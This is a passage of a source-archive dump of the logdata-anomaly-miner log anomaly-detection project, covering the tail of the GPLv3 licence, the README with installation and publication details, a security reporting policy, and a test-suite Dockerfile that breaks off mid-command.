surrender the rights. Therefore, you have certain responsibilities if you distribute copies of the software, or if you modify it: responsibilities to respect the freedom of others. For example, if you distribute copies of such a program, whether gratis or for a fee, you must pass on to the recipients the same freedoms that you received. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. Developers that use the GNU GPL protect your rights with two steps: (1) assert copyright on the software, and (2) offer you this License giving you legal permission to copy, distribute and/or modify it. 
For the developers' and authors' protection, the GPL clearly explains that there is no warranty for this free software. For both users' and authors' sake, the GPL requires that modified versions be marked as changed, so that their problems will not be attributed erroneously to authors of previous versions. Some devices are designed to deny users access to install or run modified versions of the software inside them, although the manufacturer can do so. This is fundamentally incompatible with the aim of protecting users' freedom to change the software. The systematic pattern of such abuse occurs in the area of products for individuals to use, which is precisely where it is most unacceptable. Therefore, we have designed this version of the GPL to prohibit the practice for those products. If such problems arise substantially in other domains, we stand ready to extend this provision to those domains in future versions of the GPL, as needed to protect the freedom of users. Finally, every program is threatened constantly by software patents. States should not allow patents to restrict development and use of software on general-purpose computers, but in those that do, we wish to avoid the special danger that patents applied to a free program could make it effectively proprietary. To prevent this, the GPL assures that patents cannot be used to render the program non-free. The precise terms and conditions for copying, distribution and modification follow. TERMS AND CONDITIONS 0. Definitions. "This License" refers to version 3 of the GNU General Public License. "Copyright" also means copyright-like laws that apply to other kinds of works, such as semiconductor masks. "The Program" refers to any copyrightable work licensed under this License. Each licensee is addressed as "you". "Licensees" and "recipients" may be individuals or organizations. 
To "modify" a work means to copy from or adapt all or part of the work in a fashion requiring copyright permission, other than the making of an exact copy. The resulting work is called a "modified version" of the earlier work or a work "based on" the earlier work. A "covered work" means either the unmodified Program or a work based on the Program. To "propagate" a work means to do anything with it that, without permission, would make you directly or secondarily liable for infringement under applicable copyright law, except executing it on a computer or modifying a private copy. Propagation includes copying, distribution (with or without modification), making available to the public, and in some countries other activities as well. To "convey" a work means any kind of propagation that enables other parties to make or receive copies. Mere interaction with a user through a computer network, with no transfer of a copy, is not conveying. An interactive user interface displays "Appropriate Legal Notices" to the extent that it includes a convenient and prominently visible feature that (1) displays an appropriate copyright notice, and (2) tells the user that there is no warranty for the work (except to the extent that warranties are provided), that licensees may convey the work under this License, and how to view a copy of this License. If the interface presents a list of user commands or options, such as a menu, a prominent item in the list meets this criterion. 1. Source Code. The "source code" for a work means the preferred form of the work for making modifications to it. "Object code" means any non-source form of a work. A "Standard Interface" means an interface that either is an official standard defined by a recognized standards body, or, in the case of interfaces specified for a particular programming language, one that is widely used among developers working in that language. 
The "System Libraries" of an executable work include anything, other than the work as a whole, that (a) is included in the normal form of packaging a Major Component, but which is not part of that Major Component, and (b) serves only to enable use of the work with that Major Component, or to implement a Standard Interface for which an implementation is available to the public in source code form. A "Major Component", in this context, means a major essential component (kernel, window system, and so on) of the specific operating system (if any) on which the executable work runs, or a compiler used to produce the work, or an object code interpreter used to run it. The "Corresponding Source" for a work in object code form means all the source code needed to generate, install, and (for an executable work) run the object code and to modify the work, including scripts to control those activities. However, it does not include the work's System Libraries, or general-purpose tools or generally available free programs which are used unmodified in performing those activities but which are not part of the work. For example, Corresponding Source includes interface definition files associated with source files for the work, and the source code for shared libraries and dynamically linked subprograms that the work is specifically designed to require, such as by intimate data communication or control flow between those subprograms and other parts of the work. The Corresponding Source need not include anything that users can regenerate automatically from other parts of the Corresponding Source. The Corresponding Source for a work in source code form is that same work. 2. Basic Permissions. All rights granted under this License are granted for the term of copyright on the Program, and are irrevocable provided the stated conditions are met. This License explicitly affirms your unlimited permission to run the unmodified Program. 
The output from running a covered work is covered by this License only if the output, given its content, constitutes a covered work. This License acknowledges your rights of fair use or other equivalent, as provided by copyright law. You may make, run and propagate covered works that you do not convey, without conditions so long as your license otherwise remains in force. You may convey covered works to others for the sole purpose of having them make modifications exclusively for you, or provide you with facilities for running those works, provided that you comply with the terms of this License in conveying all material for which you do not control copyright. Those thus making or running the covered works for you must do so exclusively on your behalf, under your direction and control, on terms that prohibit them from making any copies of your copyrighted material outside their relationship with you. Conveying under any other circumstances is permitted solely under the conditions stated below. Sublicensing is not allowed; section 10 makes it unnecessary. 3. Protecting Users' Legal Rights From Anti-Circumvention Law. No covered work shall be deemed part of an effective technological measure under any applicable law fulfilling obligations under article 11 of the WIPO copyright treaty adopted on 20 December 1996, or similar laws prohibiting or restricting circumvention of such measures. When you convey a covered work, you waive any legal power to forbid circumvention of technological measures to the extent such circumvention is effected by exercising rights under this License with respect to the covered work, and you disclaim any intention to limit operation or modification of the work as a means of enforcing, against the work's users, your or third parties' legal rights to forbid circumvention of technological measures. 4. Conveying Verbatim Copies. 
You may convey verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice; keep intact all notices stating that this License and any non-permissive terms added in accord with section 7 apply to the code; keep intact all notices of the absence of any warranty; and give all recipients a copy of this License along with the Program. You may charge any price or no price for each copy that you convey, and you may offer support or warranty protection for a fee. 5. Conveying Modified Source Versions. You may convey a work based on the Program, or the modifications to produce it from the Program, in the form of source code under the terms of section 4, provided that you also meet all of these conditions: a) The work must carry prominent notices stating that you modified it, and giving a relevant date. b) The work must carry prominent notices stating that it is released under this License and any conditions added under section 7. This requirement modifies the requirement in section 4 to "keep intact all notices". c) You must license the entire work, as a whole, under this License to anyone who comes into possession of a copy. This License will therefore apply, along with any applicable section 7 additional terms, to the whole of the work, and all its parts, regardless of how they are packaged. This License gives no permission to license the work in any other way, but it does not invalidate such permission if you have separately received it. d) If the work has interactive user interfaces, each must display Appropriate Legal Notices; however, if the Program has interactive interfaces that do not display Appropriate Legal Notices, your work need not make them do so. 
A compilation of a covered work with other separate and independent works, which are not by their nature extensions of the covered work, and which are not combined with it such as to form a larger program, in or on a volume of a storage or distribution medium, is called an "aggregate" if the compilation and its resulting copyright are not used to limit the access or legal rights of the compilation's users beyond what the individual works permit. Inclusion of a covered work in an aggregate does not cause this License to apply to the other parts of the aggregate. 6. Conveying Non-Source Forms. You may convey a covered work in object code form under the terms of sections 4 and 5, provided that you also convey the machine-readable Corresponding Source under the terms of this License, in one of these ways: a) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by the Corresponding Source fixed on a durable physical medium customarily used for software interchange. b) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by a written offer, valid for at least three years and valid for as long as you offer spare parts or customer support for that product model, to give anyone who possesses the object code either (1) a copy of the Corresponding Source for all the software in the product that is covered by this License, on a durable physical medium customarily used for software interchange, for a price no more than your reasonable cost of physically performing this conveying of source, or (2) access to copy the Corresponding Source from a network server at no charge. c) Convey individual copies of the object code with a copy of the written offer to provide the Corresponding Source. This alternative is allowed only occasionally and noncommercially, and only if you received the object code with such an offer, in accord with subsection 6b. 
d) Convey the object code by offering access from a designated place (gratis or for a charge), and offer equivalent access to the Corresponding Source in the same way through the same place at no further charge. You need not require recipients to copy the Corresponding Source along with the object code. If the place to copy the object code is a network server, the Corresponding Source may be on a different server (operated by you or a third party) that supports equivalent copying facilities, provided you maintain clear directions next to the object code saying where to find the Corresponding Source. Regardless of what server hosts the Corresponding Source, you remain obligated to ensure that it is available for as long as needed to satisfy these requirements. e) Convey the object code using peer-to-peer transmission, provided you inform other peers where the object code and Corresponding Source of the work are being offered to the general public at no charge under subsection 6d. A separable portion of the object code, whose source code is excluded from the Corresponding Source as a System Library, need not be included in conveying the object code work. A "User Product" is either (1) a "consumer product", which means any tangible personal property which is normally used for personal, family, or household purposes, or (2) anything designed or sold for incorporation into a dwelling. In determining whether a product is a consumer product, doubtful cases shall be resolved in favor of coverage. For a particular product received by a particular user, "normally used" refers to a typical or common use of that class of product, regardless of the status of the particular user or of the way in which the particular user actually uses, or expects or is expected to use, the product. 
A product is a consumer product regardless of whether the product has substantial commercial, industrial or non-consumer uses, unless such uses represent the only significant mode of use of the product. "Installation Information" for a User Product means any methods, procedures, authorization keys, or other information required to install and execute modified versions of a covered work in that User Product from a modified version of its Corresponding Source. The information must suffice to ensure that the continued functioning of the modified object code is in no case prevented or interfered with solely because modification has been made. If you convey an object code work under this section in, or with, or specifically for use in, a User Product, and the conveying occurs as part of a transaction in which the right of possession and use of the User Product is transferred to the recipient in perpetuity or for a fixed term (regardless of how the transaction is characterized), the Corresponding Source conveyed under this section must be accompanied by the Installation Information. But this requirement does not apply if neither you nor any third party retains the ability to install modified object code on the User Product (for example, the work has been installed in ROM). The requirement to provide Installation Information does not include a requirement to continue to provide support service, warranty, or updates for a work that has been modified or installed by the recipient, or for the User Product in which it has been modified or installed. Access to a network may be denied when the modification itself materially and adversely affects the operation of the network or violates the rules and protocols for communication across the network. 
Corresponding Source conveyed, and Installation Information provided, in accord with this section must be in a format that is publicly documented (and with an implementation available to the public in source code form), and must require no special password or key for unpacking, reading or copying. 7. Additional Terms. "Additional permissions" are terms that supplement the terms of this License by making exceptions from one or more of its conditions. Additional permissions that are applicable to the entire Program shall be treated as though they were included in this License, to the extent that they are valid under applicable law. If additional permissions apply only to part of the Program, that part may be used separately under those permissions, but the entire Program remains governed by this License without regard to the additional permissions. When you convey a copy of a covered work, you may at your option remove any additional permissions from that copy, or from any part of it. (Additional permissions may be written to require their own removal in certain cases when you modify the work.) You may place additional permissions on material, added by you to a covered work, for which you have or can give appropriate copyright permission. 
Notwithstanding any other provision of this License, for material you add to a covered work, you may (if authorized by the copyright holders of that material) supplement the terms of this License with terms: a) Disclaiming warranty or limiting liability differently from the terms of sections 15 and 16 of this License; or b) Requiring preservation of specified reasonable legal notices or author attributions in that material or in the Appropriate Legal Notices displayed by works containing it; or c) Prohibiting misrepresentation of the origin of that material, or requiring that modified versions of such material be marked in reasonable ways as different from the original version; or d) Limiting the use for publicity purposes of names of licensors or authors of the material; or e) Declining to grant rights under trademark law for use of some trade names, trademarks, or service marks; or f) Requiring indemnification of licensors and authors of that material by anyone who conveys the material (or modified versions of it) with contractual assumptions of liability to the recipient, for any liability that these contractual assumptions directly impose on those licensors and authors. All other non-permissive additional terms are considered "further restrictions" within the meaning of section 10. If the Program as you received it, or any part of it, contains a notice stating that it is governed by this License along with a term that is a further restriction, you may remove that term. If a license document contains a further restriction but permits relicensing or conveying under this License, you may add to a covered work material governed by the terms of that license document, provided that the further restriction does not survive such relicensing or conveying. 
If you add terms to a covered work in accord with this section, you must place, in the relevant source files, a statement of the additional terms that apply to those files, or a notice indicating where to find the applicable terms. Additional terms, permissive or non-permissive, may be stated in the form of a separately written license, or stated as exceptions; the above requirements apply either way. 8. Termination. You may not propagate or modify a covered work except as expressly provided under this License. Any attempt otherwise to propagate or modify it is void, and will automatically terminate your rights under this License (including any patent licenses granted under the third paragraph of section 11). However, if you cease all violation of this License, then your license from a particular copyright holder is reinstated (a) provisionally, unless and until the copyright holder explicitly and finally terminates your license, and (b) permanently, if the copyright holder fails to notify you of the violation by some reasonable means prior to 60 days after the cessation. Moreover, your license from a particular copyright holder is reinstated permanently if the copyright holder notifies you of the violation by some reasonable means, this is the first time you have received notice of violation of this License (for any work) from that copyright holder, and you cure the violation prior to 30 days after your receipt of the notice. Termination of your rights under this section does not terminate the licenses of parties who have received copies or rights from you under this License. If your rights have been terminated and not permanently reinstated, you do not qualify to receive new licenses for the same material under section 10. 9. Acceptance Not Required for Having Copies. You are not required to accept this License in order to receive or run a copy of the Program. 
Ancillary propagation of a covered work occurring solely as a consequence of using peer-to-peer transmission to receive a copy likewise does not require acceptance. However, nothing other than this License grants you permission to propagate or modify any covered work. These actions infringe copyright if you do not accept this License. Therefore, by modifying or propagating a covered work, you indicate your acceptance of this License to do so. 10. Automatic Licensing of Downstream Recipients. Each time you convey a covered work, the recipient automatically receives a license from the original licensors, to run, modify and propagate that work, subject to this License. You are not responsible for enforcing compliance by third parties with this License. An "entity transaction" is a transaction transferring control of an organization, or substantially all assets of one, or subdividing an organization, or merging organizations. If propagation of a covered work results from an entity transaction, each party to that transaction who receives a copy of the work also receives whatever licenses to the work the party's predecessor in interest had or could give under the previous paragraph, plus a right to possession of the Corresponding Source of the work from the predecessor in interest, if the predecessor has it or can get it with reasonable efforts. You may not impose any further restrictions on the exercise of the rights granted or affirmed under this License. For example, you may not impose a license fee, royalty, or other charge for exercise of rights granted under this License, and you may not initiate litigation (including a cross-claim or counterclaim in a lawsuit) alleging that any patent claim is infringed by making, using, selling, offering for sale, or importing the Program or any portion of it. 11. Patents. A "contributor" is a copyright holder who authorizes use under this License of the Program or a work on which the Program is based. 
The work thus licensed is called the contributor's "contributor version". A contributor's "essential patent claims" are all patent claims owned or controlled by the contributor, whether already acquired or hereafter acquired, that would be infringed by some manner, permitted by this License, of making, using, or selling its contributor version, but do not include claims that would be infringed only as a consequence of further modification of the contributor version. For purposes of this definition, "control" includes the right to grant patent sublicenses in a manner consistent with the requirements of this License. Each contributor grants you a non-exclusive, worldwide, royalty-free patent license under the contributor's essential patent claims, to make, use, sell, offer for sale, import and otherwise run, modify and propagate the contents of its contributor version. In the following three paragraphs, a "patent license" is any express agreement or commitment, however denominated, not to enforce a patent (such as an express permission to practice a patent or covenant not to sue for patent infringement). To "grant" such a patent license to a party means to make such an agreement or commitment not to enforce a patent against the party. If you convey a covered work, knowingly relying on a patent license, and the Corresponding Source of the work is not available for anyone to copy, free of charge and under the terms of this License, through a publicly available network server or other readily accessible means, then you must either (1) cause the Corresponding Source to be so available, or (2) arrange to deprive yourself of the benefit of the patent license for this particular work, or (3) arrange, in a manner consistent with the requirements of this License, to extend the patent license to downstream recipients. 
"Knowingly relying" means you have actual knowledge that, but for the patent license, your conveying the covered work in a country, or your recipient's use of the covered work in a country, would infringe one or more identifiable patents in that country that you have reason to believe are valid. If, pursuant to or in connection with a single transaction or arrangement, you convey, or propagate by procuring conveyance of, a covered work, and grant a patent license to some of the parties receiving the covered work authorizing them to use, propagate, modify or convey a specific copy of the covered work, then the patent license you grant is automatically extended to all recipients of the covered work and works based on it. A patent license is "discriminatory" if it does not include within the scope of its coverage, prohibits the exercise of, or is conditioned on the non-exercise of one or more of the rights that are specifically granted under this License. You may not convey a covered work if you are a party to an arrangement with a third party that is in the business of distributing software, under which you make payment to the third party based on the extent of your activity of conveying the work, and under which the third party grants, to any of the parties who would receive the covered work from you, a discriminatory patent license (a) in connection with copies of the covered work conveyed by you (or copies made from those copies), or (b) primarily for and in connection with specific products or compilations that contain the covered work, unless you entered into that arrangement, or that patent license was granted, prior to 28 March 2007. Nothing in this License shall be construed as excluding or limiting any implied license or other defenses to infringement that may otherwise be available to you under applicable patent law. 12. No Surrender of Others' Freedom. 
If conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot convey a covered work so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not convey it at all. For example, if you agree to terms that obligate you to collect a royalty for further conveying from those to whom you convey the Program, the only way you could satisfy both those terms and this License would be to refrain entirely from conveying the Program. 13. Use with the GNU Affero General Public License. Notwithstanding any other provision of this License, you have permission to link or combine any covered work with a work licensed under version 3 of the GNU Affero General Public License into a single combined work, and to convey the resulting work. The terms of this License will continue to apply to the part which is the covered work, but the special requirements of the GNU Affero General Public License, section 13, concerning interaction through a network will apply to the combination as such. 14. Revised Versions of this License. The Free Software Foundation may publish revised and/or new versions of the GNU General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies that a certain numbered version of the GNU General Public License "or any later version" applies to it, you have the option of following the terms and conditions either of that numbered version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of the GNU General Public License, you may choose any version ever published by the Free Software Foundation. 
If the Program specifies that a proxy can decide which future versions of the GNU General Public License can be used, that proxy's public statement of acceptance of a version permanently authorizes you to choose that version for the Program. Later license versions may give you additional or different permissions. However, no additional obligations are imposed on any author or copyright holder as a result of your choosing to follow a later version. 15. Disclaimer of Warranty. THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 16. Limitation of Liability. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. 17. Interpretation of Sections 15 and 16. 
If the disclaimer of warranty and limitation of liability provided above cannot be given local legal effect according to their terms, reviewing courts shall apply local law that most closely approximates an absolute waiver of all civil liability in connection with the Program, unless a warranty or assumption of liability accompanies a copy of the Program in return for a fee. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively state the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. <one line to give the program's name and a brief idea of what it does.> Copyright (C) <year> <name of author> This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <https://www.gnu.org/licenses/>. Also add information on how to contact you by electronic and paper mail. If the program does terminal interaction, make it output a short notice like this when it starts in an interactive mode: <program> Copyright (C) <year> <name of author> This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. 
The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, your program's commands might be different; for a GUI interface, you would use an "about box". You should also get your employer (if you work as a programmer) or school, if any, to sign a "copyright disclaimer" for the program, if necessary. For more information on this, and how to apply and follow the GNU GPL, see <https://www.gnu.org/licenses/>. The GNU General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License. But first, please read <https://www.gnu.org/philosophy/why-not-lgpl.html>. logdata-anomaly-miner-2.6.1/README.md000066400000000000000000000122231437606560100171700ustar00rootroot00000000000000# logdata-anomaly-miner [![Build Status](https://aecidjenkins.ait.ac.at/buildStatus/icon?job=AECID%2FAECID%2Flogdata-anomaly-miner%2Fmain)](https://aecidjenkins.ait.ac.at/job/AECID/job/AECID/job/logdata-anomaly-miner/job/main/) [![DeepSource](https://static.deepsource.io/deepsource-badge-light-mini.svg)](https://deepsource.io/gh/ait-aecid/logdata-anomaly-miner/?ref=repository-badge) This tool parses log data and allows you to define analysis pipelines for anomaly detection. It was designed to run the analysis with limited resources and the lowest possible permissions, to make it suitable for use on production servers. [![AECID Demo – Anomaly Detection with aminer and Reporting to IBM QRadar](https://img.youtube.com/vi/tL7KiMf8NfE/0.jpg)](https://www.youtube.com/watch?v=tL7KiMf8NfE) ## Requirements In order to install logdata-anomaly-miner a **Linux system** with **python >= 3.6** is required. **Debian-based** distributions are currently recommended. 
_See [requirements.txt](https://github.com/ait-aecid/logdata-anomaly-miner/blob/main/requirements.txt) for further module dependencies_ ## Installation ### Debian There are Debian packages for logdata-anomaly-miner in the official Debian/Ubuntu repositories. ``` apt-get update && apt-get install logdata-anomaly-miner ``` ### From source The following commands will install the latest stable release: ``` cd $HOME wget https://raw.githubusercontent.com/ait-aecid/logdata-anomaly-miner/main/scripts/aminer_install.sh chmod +x aminer_install.sh ./aminer_install.sh ``` Note that this fetches the installer from the unversioned `main` branch and executes it as-is. Review the downloaded script before running it, and prefer checking out a release tag if you need a reproducible installation. ### Docker For installation with Docker see: [Deployment with Docker](https://github.com/ait-aecid/logdata-anomaly-miner/wiki/Deployment-with-Docker) ## Getting started Here are some resources to read in order to get started with configurations: * [Getting started](https://github.com/ait-aecid/logdata-anomaly-miner/wiki/Getting-started-(tutorial)) * [Some available configurations](https://github.com/ait-aecid/logdata-anomaly-miner/tree/main/source/root/etc/aminer/) * [Documentation](https://aeciddocs.ait.ac.at/logdata-anomaly-miner/) * [Wiki](https://github.com/ait-aecid/logdata-anomaly-miner/wiki) ## Publications Publications and talks: * Wurzenberger M., Skopik F., Settanni G., Fiedler R. (2018): [AECID: A Self-learning Anomaly Detection Approach Based on Light-weight Log Parser Models](http://www.scitepress.org/DigitalLibrary/Link.aspx?doi=10.5220/0006643003860397). [4th International Conference on Information Systems Security and Privacy (ICISSP 2018)](http://www.icissp.org/), January 22-24, 2018, Funchal, Madeira - Portugal. INSTICC. \[[PDF](https://www.markuswurzenberger.com/wp-content/uploads/2020/05/2018_icissp.pdf)\] * Wurzenberger M., Landauer M., Skopik F., Kastner W. (2019): [AECID-PG: A Tree-Based Log Parser Generator To Enable Log Analysis](https://ieeexplore.ieee.org/document/8717887). 
[4th IEEE/IFIP International Workshop on Analytics for Network and Service Management (AnNet 2019)](https://annet2019.moogsoft.com/) in conjunction with the [IFIP/IEEE International Symposium on Integrated Network Management (IM)](https://im2019.ieee-im.org/), April 8, 2019, Washington D.C., USA. IEEE. \[[PDF](https://www.markuswurzenberger.com/wp-content/uploads/2020/05/2019_annet.pdf)\] * Landauer M., Skopik F., Wurzenberger M., Hotwagner W., Rauber A. (2019): [A Framework for Cyber Threat Intelligence Extraction from Raw Log Data](https://ieeexplore.ieee.org/document/9006328). [International Workshop on Big Data Analytics for Cyber Threat Hunting (CyberHunt 2019)](https://securitylab.no/cyberhunt2019/) in conjunction with the [IEEE International Conference on Big Data 2019](http://bigdataieee.org/BigData2019/), December 9-12, 2019, Los Angeles, CA, USA. IEEE. \[[PDF](https://www.markuswurzenberger.com/wp-content/uploads/2020/05/2019_cyberhunt.pdf)\] A complete list of publications can be found at [https://aecid.ait.ac.at/further-information/](https://aecid.ait.ac.at/further-information/). ## Contribution We're happily taking patches and other contributions. Please see the following links for how to get started: * [ How to install a development environment ](https://github.com/ait-aecid/logdata-anomaly-miner/wiki/Installing-a-development-environment) * [ Git development workflow ](https://github.com/ait-aecid/logdata-anomaly-miner/wiki/Git-development-workflow) ## Bugs If you encounter any bugs, please create an issue on [Github](https://github.com/ait-aecid/logdata-anomaly-miner/issues). ## Security If you discover any security-related issues read the [SECURITY.md](/SECURITY.md) first and report the issues. 
## License [GPL-3.0](LICENSE) ## Financial Support This project received financial support through the research projects CAIS (832345), CIIS (840842), and CISA (850199) in the course of the Austrian KIRAS security research programme, the research projects synERGY (855457) and DECEPT (873980) in the course of the ICT of the future programme of the Austrian Research Promotion Agency (FFG), the research project PANDORA (SI2.835928) in the course of the European Defence Industrial Development Programme (EDIDP), as well as the research projects ECOSSIAN (607577) and GUARD (833456) in the course of the European Seventh Framework Programme (FP7) and Horizon 2020. logdata-anomaly-miner-2.6.1/SECURITY.md000066400000000000000000000033741437606560100175070ustar00rootroot00000000000000# Security Policy ## Supported Versions | Version | Supported | | ------- | ------------------ | | 2.x.x | :white_check_mark: | | < 2.0.0 | :x: | ## Reporting a Vulnerability Please email reports about any security-related issues you find to aecid@ait.ac.at. This mail is delivered to a small developer team. Your email will be acknowledged within one business day, and you'll receive a more detailed response to your email within 7 days indicating the next steps in handling your report. Please use a descriptive subject line for your report email. After the initial reply to your report, our team will endeavor to keep you informed of the progress being made towards a fix and announcement. In addition, please include the following information along with your report: * Your name and affiliation (if any). * A description of the technical details of the vulnerabilities. It is very important to let us know how we can reproduce your findings. * An explanation of who can exploit this vulnerability, and what they gain when doing so -- write an attack scenario. This will help us evaluate your report quickly, especially if the issue is complex. * Whether this vulnerability is public or known to third parties. 
If it is, please provide details. * Whether we could mention your name in the changelogs. Once an issue is reported we use the following disclosure process: * When a report is received, we confirm the issue and determine its severity. * If we know of specific third-party services or software based on logdata-anomaly-miner that require mitigation before publication, those projects will be notified. * Fixes are prepared for the last minor release of the latest major release. * Patch releases are published for all fixed released versions. logdata-anomaly-miner-2.6.1/aecid-testsuite/000077500000000000000000000000001437606560100210055ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/Dockerfile000066400000000000000000000117221437606560100230020ustar00rootroot00000000000000# # PLEASE NOTE THAT YOUR WORKING-DIRECTORY MUST BE THE ROOT OF THIS REPOSITORY # IN ORDER WO BUILD THIS CONTAINER-IMAGE!!! # # Build: # docker build -f aecid-testsuite/Dockerfile -t aecid/logdata-anomaly-miner-testing:latest . # # Use: # docker run -m=2G --rm aecid/logdata-anomaly-miner-testing runUnittests # # Run all tests: # docker run -m=2G --rm aecid/logdata-anomaly-miner-testing ALL # # Run a shell inside the container: # docker run -m=2G -it --rm aecid/logdata-anomaly-miner-testing SHELL # # See: https://github.com/ait-aecid/logdata-anomaly-miner/wiki/How-to-use-the-AECID-testsuite # # Pull base image. 
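FROM debian:bullseye

# Set local timezone
ENV TZ=Europe/Vienna
RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone

LABEL maintainer="wolfgang.hotwagner@ait.ac.at"

# Install necessary debian packages.
# Every package is listed exactly once (the previous list named python3-pip,
# python3-scipy and postfix twice; apt tolerates that but it obscures what is
# really installed). "sudo" is on the list because the test user receives a
# passwordless sudoers entry further down in this file: the image is a test
# runner for the aecid-testsuite, not a deployable aminer installation.
ARG DEBIAN_FRONTEND=noninteractive
RUN apt-get update && apt-get install -y \
    python3 \
    python3-pip \
    python3-tz \
    python3-scipy \
    python3-pkg-resources \
    python3-setuptools \
    python3-dateutil \
    python3-six \
    python3-kafka \
    python3-cerberus \
    python3-yaml \
    python3-pylibacl \
    python3-urllib3 \
    python3-statsmodels \
    libacl1-dev \
    postfix \
    procps \
    mailutils \
    sudo \
    curl \
    vim \
    openjdk-11-jre \
    locales \
    locales-all \
    rsyslog \
    git \
    mypy \
    wget

# Generate the en_US.UTF-8 and de_AT locales used by the tests and make
# en_US.UTF-8 the default for every process in the image.
RUN sed -i -e 's/# en_US.UTF-8 UTF-8/en_US.UTF-8 UTF-8/' /etc/locale.gen && \
    sed -i -e 's/# de_AT ISO-8859-1/de_AT ISO-8859-1/' /etc/locale.gen && \
    dpkg-reconfigure --frontend=noninteractive locales && \
    update-locale LANG=en_US.UTF-8
# key=value form of ENV; the legacy "ENV key value" form sets the same values.
ENV LANG=en_US.UTF-8
ENV LANGUAGE=en_US:en
ENV LC_ALL=en_US.UTF-8

# RUN pip3 install coverage

# Copy logdata-anomaly-miner-sources.
# ADD is kept for all local paths to leave the build unchanged; COPY would be
# the usual choice here, since ADD additionally fetches URLs and unpacks
# archives, neither of which is wanted for these sources.
ADD source/root/usr/lib/logdata-anomaly-miner /usr/lib/logdata-anomaly-miner

# copy these files instead as symlinks would need absolute paths.
ADD source/root/etc/aminer/conf-available/ait-lds/* /etc/aminer/conf-enabled/
ADD source/root/etc/aminer/conf-available/generic/* /etc/aminer/conf-enabled/
ADD source/root/etc/aminer/conf-available/ait-lds /etc/aminer/conf-available/ait-lds
ADD source/root/etc/aminer/conf-available/generic /etc/aminer/conf-available/generic

# Entrypoint-wrapper
ADD scripts/aminerwrapper.sh /aminerwrapper.sh

# Prepare the system and link all python-modules.
# The aminer user is created with /usr/sbin/nologin as shell, so it has no
# interactive login; /var/lib/aminer (persistence and log directory) is
# handed to that user.
RUN ln -s /usr/lib/logdata-anomaly-miner/aminerremotecontrol.py /usr/bin/aminerremotecontrol \
    && ln -s /usr/lib/logdata-anomaly-miner/aminer.py /usr/bin/aminer \
    && chmod 0755 /usr/lib/logdata-anomaly-miner/aminer.py \
    && chmod 0755 /usr/lib/logdata-anomaly-miner/aminerremotecontrol.py \
    && ln -s /usr/lib/python3/dist-packages/kafka /etc/aminer/conf-enabled/kafka \
    && ln -s /usr/lib/python3/dist-packages/cerberus /etc/aminer/conf-enabled/cerberus \
    && ln -s /usr/lib/python3/dist-packages/scipy /etc/aminer/conf-enabled/scipy \
    && ln -s /usr/lib/python3/dist-packages/numpy /etc/aminer/conf-enabled/numpy \
    && ln -s /usr/lib/python3/dist-packages/pkg_resources /etc/aminer/conf-enabled/pkg_resources \
    && ln -s /usr/lib/python3/dist-packages/yaml /etc/aminer/conf-enabled/yaml \
    && ln -s /usr/lib/python3/dist-packages/pytz /etc/aminer/conf-enabled/pytz \
    && ln -s /usr/lib/python3/dist-packages/dateutil /etc/aminer/conf-enabled/dateutil \
    && ln -s /usr/lib/python3/dist-packages/six.py /etc/aminer/conf-enabled/six.py \
    && ln -s /usr/lib/python3/dist-packages/urllib3 /etc/aminer/conf-enabled/urllib3 \
    && ln -s /usr/lib/python3/dist-packages/statsmodels /etc/aminer/conf-enabled/statsmodels \
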